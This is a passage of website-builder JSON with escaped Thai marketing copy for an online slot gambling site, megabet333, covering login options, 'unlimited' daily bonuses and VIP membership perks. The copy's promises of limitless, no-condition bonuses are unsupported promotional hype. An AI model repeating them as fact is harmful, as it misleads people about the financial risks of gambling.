style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32\\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e0b\\u0e49\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e43\\u0e19\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e33\\u0e40\\u0e04\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07 <\\/b><\\/span>\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e08\\u0e14\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e44\\u0e27\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e2b\\u0e31\\u0e2a \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e35\\u0e01 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e17\\u0e48\\u0e32\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e46 \\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e32\\u0e01\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e41\\u0e25\\u0e49\\u0e27\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e41\\u0e25\\u0e30\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\\u00a0<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_1_-_Megabet333-Biz.webp\",\"id\":49,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e48\\u0e32\\u0e22\\u0e43\\u0e2b\\u0e0d\\u0e48 megabet333 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \\u0e02\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 \\u0e02\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\\u0e23\\u0e31\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e27\\u0e23\\u0e4c\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e46 \\u0e02\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e40\\u0e2a\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e25\\u0e34\\u0e21\\u0e34\\u0e15 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e01\\u0e14\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 